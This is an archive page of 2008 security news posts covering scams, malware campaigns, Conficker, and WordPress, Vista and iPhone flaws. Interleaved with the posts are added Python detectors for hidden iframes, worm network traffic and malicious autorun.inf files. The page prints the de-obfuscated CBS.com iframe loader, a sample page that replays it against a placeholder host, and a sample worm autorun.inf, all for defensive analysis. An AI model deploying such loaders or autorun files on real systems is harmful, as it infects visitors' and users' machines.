CyberInsecure.com

Daily cyber threats and internet security news: network security, online safety and latest security alerts

Archive for November, 2008

PayPal Is Being Used In Popular Nigerian 419 Scam

Friday, November 28th, 2008

A new variant of the popular Nigerian 419 scam is being run through PayPal, according to a report by The Inquirer. The 419 scam is named after the relevant section of the Nigerian Criminal Code, and the premise is always the same: somebody offers to pay money into your account and give you a cut when you send it back. In truth the whole thing is money laundering, but this latest twist – using PayPal – is significant because, on the surface, it looks like there’s no catch.

Instead of receiving the offer via email (as is normally the case), the target was approached over a Skype chat session. The perpetrator wants to transfer funds out of a PayPal account and convert them back into US dollars. All the victim needed to do was check his PayPal account and, when the money arrived, send a significantly lower amount back via Western Union.

Due to PayPal’s payment reversal policy, there is a loophole which enables the scam to work. As the payment would be classified as ‘services’ rather than goods, there would be no proof that the victim – who becomes the ‘vendor’ – provided any goods. So the ‘buyer’ – in this case the scammer – gets the money back. In the meantime, the vendor has sent the dollars via Western Union and finds himself stuck with no means of recourse.

Both Western Union and PayPal can be blamed for making this scam work. Western Union makes it too easy to send and receive money anonymously, while PayPal’s dispute resolution procedure is a crude automated system.

Malicious Christmas E-greetings Are Distributed Via Spam

Thursday, November 27th, 2008

Websense Security Labs has discovered that malware authors are already using Christmas themes this year as a social engineering tactic in an effort to gain control over compromised machines. This campaign uses email messages in the form of e-greetings that purport to lead to animated postcards. They actually lead to a Trojan backdoor that has been distributed in previous malicious spam campaigns.

The email messages, spoofed to appear as though they have been sent from postcards.org, display an animated Christmas scene. A URL link within the email leads to a malicious file called postcard.exe hosted on various servers, including those in the .com domain space.

Once executed, the malware creates a backdoor that gives its author access to and control over the resources of the compromised machine. Control is conducted over IRC, communicating with ircserver.*snip*.la. During the install process an image called xmas.jpg is displayed to the user as a distraction technique.

Example of malicious email:

CBS.com Subdomain Compromised, Installing Malware On Visitors’ PCs

Thursday, November 27th, 2008

Once again a legitimate website has been infected with malicious obfuscated code; this time it was CBS.com. Popular sites with very high traffic remain a favorite and highly effective attack vector for hackers.

Today Finjan revealed that a subdomain of the well-known radio and television network, etix.cbs.com, had been compromised. The cybercriminals added a malicious obfuscated script to the infected page; the injected script added a malicious IFrame to the page.

The injected IFrame automatically loads another malicious script from a remote server controlled by criminals in Russia, which can result in malware being installed on the unsuspecting client machine. De-obfuscated script code from the cbs.com sub-domain:

<SCRIPT> window.status='Done'; document.write('<iframe name=29dee5c6 src=\'http://[REMOVED]/.if/go.html?' +Math.round(Math.random()*257224)+'3e78\' width=632 height=407 style=\'display: none\'></iframe>') </SCRIPT>
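The injected script above never puts an <iframe> tag into the static HTML; it assembles one at run time with document.write(), so a scanner that only looks at the markup misses it. The following Python is an added example (not code from the article or from Finjan) that flags hidden iframes in a page, including ones built inside inline scripts: it reassembles the string literals of each document.write() call, replacing non-literal pieces such as Math.random() with a placeholder, and then checks the resulting tag for display:none or 1x1 dimensions. The sample page and the hostnames in it are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# A JavaScript string literal, honouring backslash escapes such as \' and \".
STRING_LITERAL = re.compile(r"'((?:\\.|[^'\\])*)'|\"((?:\\.|[^\"\\])*)\"", re.S)
DOCUMENT_WRITE = re.compile(r"document\.write\s*\(")


class IframeCollector(HTMLParser):
    """Collects <iframe> attribute dicts and the bodies of inline <script>s."""

    def __init__(self):
        super().__init__()
        self.iframes, self.scripts = [], []
        self._script_buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._script_buf = []

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            self.scripts.append("".join(self._script_buf))
            self._script_buf = None


def _call_argument(src, open_paren):
    """Text between the balanced parentheses that start at src[open_paren]."""
    depth = 0
    for i in range(open_paren, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_paren + 1:i]
    return src[open_paren + 1:]  # unbalanced call: take the rest


def written_markup(script_text):
    """Reassemble the markup each document.write() builds from string literals;
    non-literal pieces (e.g. Math.random()) become the placeholder {expr}."""
    fragments = []
    for call in DOCUMENT_WRITE.finditer(script_text):
        arg = _call_argument(script_text, call.end() - 1)
        pieces, pos = [], 0
        for lit in STRING_LITERAL.finditer(arg):
            if arg[pos:lit.start()].strip(" +\r\n\t"):
                pieces.append("{expr}")
            raw = lit.group(1) if lit.group(1) is not None else lit.group(2)
            pieces.append(re.sub(r"\\(.)", r"\1", raw))  # drop JS escapes
            pos = lit.end()
        fragments.append("".join(pieces))
    return fragments


def _is_hidden(attrs):
    if HIDDEN_STYLE.search(attrs.get("style") or ""):
        return True
    try:  # 1x1 / 0x0 frames are the other common way to hide a loader
        return int(attrs.get("width") or 1) <= 1 or int(attrs.get("height") or 1) <= 1
    except ValueError:
        return False


def hidden_iframes(html):
    """One dict per hidden iframe: src host, name, and whether it came from
    static markup or from a document.write() call."""
    page = IframeCollector()
    page.feed(html)
    page.close()
    candidates = [(a, "static") for a in page.iframes]
    for script in page.scripts:
        for fragment in written_markup(script):
            sub = IframeCollector()
            sub.feed(fragment)
            sub.close()
            candidates.extend((a, "document.write") for a in sub.iframes)
    report = []
    for attrs, origin in candidates:
        if not _is_hidden(attrs):
            continue
        src = attrs.get("src") or ""
        try:
            host = urlsplit(src).hostname or "(relative)"
        except ValueError:
            host = src
        report.append({"host": host, "name": attrs.get("name"), "origin": origin})
    return report


# Constructed sample: a legitimate embed, a loader of the injected shape, a 1x1 tracker.
SAMPLE_PAGE = r"""<html><body><h1>Box office</h1>
<iframe src="https://player.example/embed/42" width=640 height=360></iframe>
<SCRIPT> window.status='Done'; document.write('<iframe name=29dee5c6 src=\'http://malicious.example/.if/go.html?' +Math.round(Math.random()*257224)+'3e78\' width=632 height=407 style=\'display: none\'></iframe>') </SCRIPT>
<iframe src="http://tracker.example/p.html" width=1 height=1></iframe>
</body></html>"""

if __name__ == "__main__":
    for hit in hidden_iframes(SAMPLE_PAGE):
        print(hit)
```

Run against the sample, it reports the 1x1 tracker from the static markup and the display:none frame built by the script, with the latter attributed to document.write; the legitimate 640x360 player is not reported. The parenthesis matcher ignores parentheses inside string literals, which is enough for loaders of this shape but not for arbitrary JavaScript.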

The malicious Russian server from which the IFrame pulled its code was located in Saint Petersburg and hosted by “ZAO National Telecomunications ISP”.

Finjan immediately informed CBS.com of the infection and currently the remote Russian server is down.

Another Worm Exploiting MS08-067 Windows Flaw Spotted In The Wild

Thursday, November 27th, 2008

Microsoft’s Security Response Center and McAfee are warning of increased network scanning activity over the last couple of days, courtesy of the latest W32/Conficker.worm, which exploits the already patched MS08-067 vulnerability. After last month’s ruckus over Microsoft’s out-of-band patch, another threat leveraging MS08-067 was recently reported to be causing more trouble in the wild.

What’s particularly interesting in the latest wave of copycat worms is that W32/Conficker.worm patches the infected host in order to ensure that competing malicious parties cannot get in the same way.

This malware mostly spreads within corporations, but has also been reported by several hundred home users. It opens a random port between 1024 and 10000 and acts like a web server. It propagates to random computers on the network by exploiting MS08-067. Once a remote computer is exploited, that computer downloads a copy of the worm via HTTP from the random port opened by the worm. The worm often uses a .JPG extension for the copied file, which is then saved to the local system folder as a randomly named DLL.
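The spreading behaviour just described gives a network defender two observable signals: one host opening TCP/445 to many distinct peers (the MS08-067 scanning), followed by those peers fetching a .jpg over HTTP from a non-standard port on the scanning host. The following Python is an added example, not code from McAfee or Microsoft, that runs that heuristic over connection-log lines. The log format (timestamp, src -> dst:port, protocol, optional "GET path") and all addresses are constructed for the example; a real deployment would feed it firewall or NetFlow records in whatever format they arrive.

```python
import re
from collections import defaultdict

# Constructed log format: "<ts> <src> -> <dst>:<dport> <proto> [GET <path>]"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>[\d.]+)\s*->\s*(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<proto>\w+)"
    r"(?:\s+GET\s+(?P<path>\S+))?$"
)
WORM_PORT_RANGE = range(1024, 10001)  # the article: random port between 1024 and 10000


def parse_line(line):
    """Return a record dict for one log line, or None if it does not match."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    return rec


def find_smb_scanners(records, min_peers=5):
    """Hosts that opened TCP/445 to at least min_peers distinct destinations."""
    peers = defaultdict(set)
    for r in records:
        if r["proto"] == "tcp" and r["dport"] == 445:
            peers[r["src"]].add(r["dst"])
    return {host for host, dsts in peers.items() if len(dsts) >= min_peers}


def find_worm_fetches(records, scanners):
    """HTTP GETs for a .jpg from a port in 1024-10000 on a host that was seen
    scanning 445: the download step described for W32/Conficker.worm."""
    hits = []
    for r in records:
        path = r.get("path")
        if r["proto"] != "http" or not path:
            continue
        if (r["dst"] in scanners and r["dport"] in WORM_PORT_RANGE
                and path.lower().endswith(".jpg")):
            hits.append((r["src"], r["dst"], r["dport"], path))
    return hits


def analyze(log_text, min_peers=5):
    """Run both checks over a log and return the scanners and the fetches."""
    records = [rec for rec in map(parse_line, log_text.splitlines()) if rec]
    scanners = find_smb_scanners(records, min_peers)
    return {"scanners": sorted(scanners), "fetches": find_worm_fetches(records, scanners)}


# Constructed sample: 10.0.0.5 sweeps six neighbours on 445, two of which then
# pull a .jpg from port 4523 on it; 10.0.0.20 is ordinary file-server traffic.
SAMPLE_LOG = """\
2008-11-26T10:00:01 10.0.0.5 -> 10.0.0.11:445 tcp
2008-11-26T10:00:01 10.0.0.5 -> 10.0.0.12:445 tcp
2008-11-26T10:00:02 10.0.0.5 -> 10.0.0.13:445 tcp
2008-11-26T10:00:02 10.0.0.5 -> 10.0.0.14:445 tcp
2008-11-26T10:00:03 10.0.0.5 -> 10.0.0.15:445 tcp
2008-11-26T10:00:03 10.0.0.5 -> 10.0.0.16:445 tcp
2008-11-26T10:00:04 10.0.0.20 -> 10.0.0.2:445 tcp
2008-11-26T10:00:05 10.0.0.20 -> 10.0.0.2:80 http GET /logo.jpg
2008-11-26T10:00:09 10.0.0.11 -> 10.0.0.5:4523 http GET /x7g2.jpg
2008-11-26T10:00:10 10.0.0.12 -> 10.0.0.5:4523 http GET /x7g2.jpg
"""

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

The .jpg fetch on its own is not evidence of anything (the sample's GET /logo.jpg from a web server on port 80 is ignored); it becomes interesting only when the serving host is one that was scanning 445 and the port is in the range the worm uses. Tune min_peers to the site: vulnerability scanners and backup agents legitimately touch 445 on many hosts, so those sources belong on an allow list.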

McAfee Avert Labs has also seen a few proof-of-concept binaries using the exploit code that was released into the wild to attack this Windows Server Service vulnerability; the latest is W32/Conficker.worm. According to the description in their Virus Information Library, W32/Conficker.worm decides how to load itself as a Windows Service depending on whether the compromised version of Windows is Windows 2000. Once loaded in the service space, the worm attempts to download files from the Internet: specifically, further malware from trafficconverter.biz and data files from maxmind.com.

The public release of the proof-of-concept code in September prompted an immediate reaction from international underground communities, which released several different modifications of the exploit; the Chinese were the first to release a do-it-yourself tool allowing subnet scanning and automatic exposure to malware hosted on a third-party server.

XSS Flaw Fixed In Latest WordPress 2.6.5

Thursday, November 27th, 2008

WordPress has fixed a cross-site scripting (XSS) flaw in its blogging software. The flaw only affects IP-based virtual servers running on Apache 2.x. In those setups it might be possible for hackers to rig systems so that they serve up malicious JavaScript from domains under their control. Version 2.6.5 also addresses three unrelated performance and stability bugs in the open source package.

The first prevents accidentally saving post meta information to a revision. The second prevents XML-RPC from fetching incorrect post types. The third adds some user ID sanitization during bulk delete requests. For a list of changed files, consult the full changeset between 2.6.3 and 2.6.5.

WordPress has jumped from version 2.6.3 to 2.6.5 of the software in order to avoid confusion with 2.6.4, a fake version recently offered up by black hats via a bogus site WordpresZ. Webmasters were directed to download the backdoor-rigged code earlier this month by hackers exploiting vulnerabilities in the blogging package. There is not and never will be an official 2.6.4 version.

If you are a WordPress blog owner and interested only in the security fix, copy wp-includes/feed.php and wp-includes/version.php from the 2.6.5 release package.

Pamela-systems.com Users Database Breached, Personalized Phishing Hits Skype Users

Monday, November 24th, 2008

Online thieves managed to penetrate the defenses of Pamela Systems by exploiting a security hole in an unnamed application the website uses, according to Dick H. Schiferli, Pamela’s founder and CEO. Pamela is a piece of software that manages Skype users’ online phone accounts. Users of this software should be on the lookout for customized phishing attacks, since the hacked user databases contain names and email addresses.

The attack, which took place last week, has already led to one phishing campaign that calls recipients by their real names and then tries to trick them into turning over personal information. That added personal touch could throw some users off guard because most phishing emails address their marks by generic terms such as “Dear PayPal User.”

It is unclear how many of the site’s users had their information stolen, or how many users have registered with the site. Pamela boasts 4.5 million downloads, although the number of registered users is probably much smaller. Schiferli said his team was still in the process of contacting customers whose information was stolen. “This is our first experience with something like this,” he said. “We’re taking this very seriously. We contacted PayPal last week.” So far, they’ve yet to get a response.

The breach could prove valuable because ostensibly everyone in the user database uses Skype. That gives fraudsters important leads and information with which to tailor scams.

Credit: The Register

Gmail Exploit May Allow Attackers To Steal E-mails By Setting Forwarding Filters

Sunday, November 23rd, 2008

A Gmail security vulnerability may allow an attacker to set up filters on users’ e-mail accounts without their knowledge, according to a proof of concept posted Sunday at GeekCondition.com. The vulnerability has already caused some people to lose their domain names registered through GoDaddy.com.

The exploit starts when a user visits a malicious site while logged into Gmail. Whether the link was opened from the Gmail account or not, the malicious site can access internal credentials. After this, the malicious site can silently send data to Gmail that creates an automatic filter diverting incoming e-mail to a different e-mail account. Since all of this happens on Google’s mail servers, it can be noticed only by looking at the account’s filters.

Along with gaining access to private messages, this exploit, once in place, compromises all future e-mails in that account. For example, if your Gmail address is registered as the contact for any domain registrations, your domain might be hijacked and held to ransom through the account recovery and password-reset tools of your domain host, without your knowledge.

Without posting the full exploit, a post on GeekCondition explains how the flaw relies on obtaining the variables that represent the user name and “at”. When a user creates a filter in a Gmail account, a request is sent to Google’s servers to be processed. The request is made in the form of a URL with many variables. For security reasons, the browser doesn’t display all the variables contained within the URL. However, by using Firefox and a plugin called Live HTTP Headers, anyone can see exactly what variables are sent from the browser to Google’s servers. After that, an attacker just needs to identify the variable that is the equivalent of the username.

Obtaining this variable is tricky but possible; there are plenty of explanations about it that can easily be found via Google. The “at” variable can be obtained by visiting a malicious web site, and part of the flaw might be that the “at” variable expires after every request instead of after every session.

Until this is fixed, users should check their filters often to avoid becoming a victim of the vulnerability. As in many other cases, Firefox users can install an extension called NoScript that helps prevent these attacks. Gmail users should also log out of their accounts when they are not in use, and avoid visiting suspicious or untrusted websites.

Google has not commented on this issue at this point, but it will most likely be fixed in the next couple of days.

Update (Nov 26): According to a recent post on the Google blog, there is no evidence of a Gmail vulnerability. With help from affected users, Google determined that the cause was a phishing scheme, a common method used by malicious actors to trick people into sharing their sensitive information. Attackers sent customized e-mails encouraging web domain owners to visit fraudulent websites such as “google-hosts.com” that they set up purely to harvest usernames and passwords.

It seems that novice “webmasters” and domain owners submitted the details needed to steal their domains on fake login pages, then panicked and blamed Gmail without realizing that the filters were not set through a Gmail flaw by a “magic” URL but manually, by miscreants who logged into the Gmail accounts using phished passwords.

Attackers Might Run Unauthorized Code On Any Vista PC Due To A Flaw

Saturday, November 22nd, 2008

An Austrian security vendor has found a vulnerability in Windows Vista that it says could allow an attacker to run unauthorized code on a PC. The vulnerability could allow a hacker to install a rootkit that is very difficult to detect and remove, or any other malicious software.

The problem is rooted in Device IO Control, which handles internal device communication. Researchers at Phion have found two different ways to cause a buffer overflow that could corrupt the memory of the operating system’s kernel.

In one of the scenarios, a person would already have to have administrative rights on the PC. In general, vulnerabilities that require that level of access somewhat undermine the risk, since the attacker already has permission to use the PC. But it may be possible to trigger the buffer overflow without administrative rights, said Thomas Unterleitner, Phion’s director of endpoint security software.

Phion notified Microsoft about the problem on 22 October. Microsoft indicated to Phion that it would issue a patch with Vista’s next service pack. Microsoft released a beta version of Vista’s second service pack to testers last month. Vista’s Service Pack 2 is due for release by June 2009.

Unterleitner said there has been lots of interest in the vulnerability. “We have received requests for detailed information on how to take advantage of this exploit from all over the world,” he said.

Currently there is no comment from Microsoft officials on this issue.

12 Security Vulnerabilities Fixed In Apple iPhone OS 2.2 Update

Friday, November 21st, 2008

Apple has released iPhone OS 2.2 with patches for 12 documented security flaws, some of them very serious. The vulnerabilities covered by the update (which also affect the iPod Touch) could allow remote code execution, information theft, software crashes and weakened encryption settings.

The updates include:

CVE-2008-2321: CoreGraphics contains memory corruption issues in the processing of arguments. Passing untrusted input to CoreGraphics via an application, such as a web browser, may lead to an unexpected application termination or arbitrary code execution.

CVE-2008-2327: Multiple uninitialized memory access issues exist in libTIFF’s handling of LZW-encoded TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution.

CVE-2008-1586: A memory exhaustion issue exists in the handling of TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected device reset.

CVE-2008-4227: The encryption level for PPTP VPN connections may revert to a previous lower setting. This update addresses the issue by properly setting the encryption preferences.

CVE-2008-4211: An issue in Office Viewer’s handling of columns in Microsoft Excel files may result in an out-of-bounds memory access. Viewing a maliciously crafted Microsoft Excel file may lead to an unexpected application termination or arbitrary code execution.

CVE-2008-4228: iPhone provides the ability to make an emergency call when locked. Currently, an emergency call may be placed to any number. A person with physical access to an iPhone may take advantage of this feature to place arbitrary calls which are charged to the iPhone owner.

CVE-2008-4229: The Passcode Lock feature is designed to prevent applications from being launched unless the correct passcode is entered. A race condition in the handling of device settings may cause the Passcode Lock to be removed when the device is restored from backup. This may allow a person with physical access to the device to launch applications without the passcode.

CVE-2008-4230: If an SMS message arrives while the emergency call screen is visible, the entire SMS message is displayed, even if the “Show SMS Preview” preference was set to “OFF”. This update addresses the issue by, in this situation, displaying only a notification that an SMS message has arrived, and not its content.

CVE-2008-4231: A memory corruption issue exists in the handling of HTML table elements. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution.

CVE-2008-4232: Safari allows an iframe element to display content outside its boundaries, which may lead to user interface spoofing.

CVE-2008-4233: If an application is launched via Safari while a call approval dialog is shown, the call will be placed. This may allow a maliciously crafted website to initiate a phone call without user interaction. Additionally, under certain circumstances it may be possible for a maliciously crafted website to block the user’s ability to cancel dialing for a short period of time.

CVE-2008-3644: Disabling autocomplete on a form field may not prevent the data in the field from being stored in the browser page cache. This may lead to the disclosure of sensitive information to a person with physical access to an unlocked device.

There are still several known phishing and spamming flaws in the iPhone that remain unfixed.

USB Devices Containing Worms Threaten US Army, All Removable Devices Temporarily Banned

Thursday, November 20th, 2008

A recent increase in malicious code propagating via USB flash drives forced the US Army to suspend the use of USB and removable media devices after a worm began spreading across its network. Use of USB drives, floppy discs, CDs, external drives, flash media cards and all other removable media devices has been placed on hold in order to contain the spread of Agent-BTZ, a variant of the SillyFDC worm. Such a temporary ban would cause inconvenience in any organisation, but for the US military it’s an even more serious problem because in many locations email or online transfer of files are not viable options.

The clampdown applies to both the secret SIPR and unclassified NIPR networks, according to internal Army emails cited by Wired. Variants of the SillyFDC worm are capable of spreading over networks or removable media, infecting any Windows PC they are plugged into or, for example, any external drive connected to an infected device. The malware is programmed to download secondary infectious code from the internet, establishing a conduit that might be used to download keylogging software, password-siphoning spyware or botnet agents onto compromised machines.

Government-approved drives will reportedly be allowed back onto the network soon, but not before they’ve been scanned and cleared of malware infection. Government security teams will be running custom scripts and daily scans for the dual purposes of making sure the ban is enforced and detecting the spread of other forms of malware, Wired adds.

The ban, which gets in the way of troops’ normal work, might seem like overkill, but without knowing the full extent of the infection it’s probably a little unfair to label it as such. Security experts say that actions short of an outright ban may be appropriate for organisations facing similar problems.

Regular users and networks have been suffering from malware infections via USB for some time now. Currently, there are two popular methods by which USB flash drives are being infected with malicious code. The first is referred to as simple file copy: the malicious code initially resides on an infected computer and copies itself to all the storage devices connected to that computer. This method requires the user to access the USB flash drive and execute the malicious code.

The second method is referred to as AutoRun.inf modification: the malicious code alters or creates an autorun.inf file on storage devices connected to the affected computer. When an infected USB flash drive is connected to another computer, the malicious code can be executed automatically with no additional user interaction.

These are not the only two methods available. Users are encouraged to do the following to help mitigate the risks:

* Run antivirus software and keep the virus signatures up to date.

* Do not connect an unknown or untrusted USB drive to your computer.

* Disable AutoRun or AutoPlay features for removable media.
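The AutoRun.inf modification method above works because Windows reads a handful of keys from that file ([autorun] open=, shellexecute= and shell\...\command=) and runs what they point to. The following Python is an added example, not code from the Army, Wired or any vendor, that a helpdesk or triage script could run against an autorun.inf copied from a drive before the drive is trusted: it parses the file with a small tolerant INI reader and lists every entry that would launch code, plus two presentation tricks worms commonly add (UseAutoPlay=1, and an action= label that imitates Explorer's own "Open folder to view files" entry). Both sample files are constructed; the file names in them are placeholders.

```python
import re

LAUNCH_KEYS = ("open", "shellexecute")
EXEC_EXT = re.compile(r"\.(exe|com|bat|cmd|scr|pif|vbs|js|wsf)\b", re.I)


def parse_autorun(text):
    """Tolerant parser for autorun.inf: {section: {key: value}} with section
    and key names lowercased. Blank lines, ';' comments and lines that are
    not key=value are ignored rather than raising, as real worm files are messy."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def assess_autorun(text):
    """Return human-readable findings; an empty list means nothing in the file
    would launch code or imitate Explorer's folder entry."""
    findings = []
    auto = parse_autorun(text).get("autorun", {})
    for key, value in auto.items():
        launches = (key.split("\\")[0] in LAUNCH_KEYS
                    or (key.startswith("shell\\") and key.endswith("\\command")))
        if launches:
            findings.append(f"{key} launches {value}")
            if EXEC_EXT.search(value):
                findings.append(f"{key} points at an executable: {value}")
    if auto.get("useautoplay") == "1":
        findings.append("UseAutoPlay=1 asks Windows to run the open= target immediately")
    action = auto.get("action", "")
    if "open folder" in action.lower():
        findings.append(f"action text imitates Explorer's folder entry: {action!r}")
    return findings


# Constructed samples: a harmless label/icon file and one of the worm-like shape.
BENIGN_INF = """\
[AutoRun]
icon=photos.ico
label=Holiday photos
"""

MALICIOUS_INF = r"""[AutoRun]
open=recycler\sys.exe
shell\open\command=recycler\sys.exe
shell\open=&Open
icon=%SystemRoot%\system32\shell32.dll,4
action=Open folder to view files
UseAutoPlay=1
"""

if __name__ == "__main__":
    for name, inf in (("benign", BENIGN_INF), ("malicious", MALICIOUS_INF)):
        print(name, assess_autorun(inf) or "no findings")
```

The parser deliberately accepts the mixed-case and backslash-heavy keys that AutoRun files use instead of Python's configparser, which rejects some of them. On the host side, the third bullet above (disabling AutoRun for removable media) is what removes the execution path entirely; a file like MALICIOUS_INF then does nothing by itself, and this check becomes a way to confirm a drive is carrying a worm rather than a way to stop it.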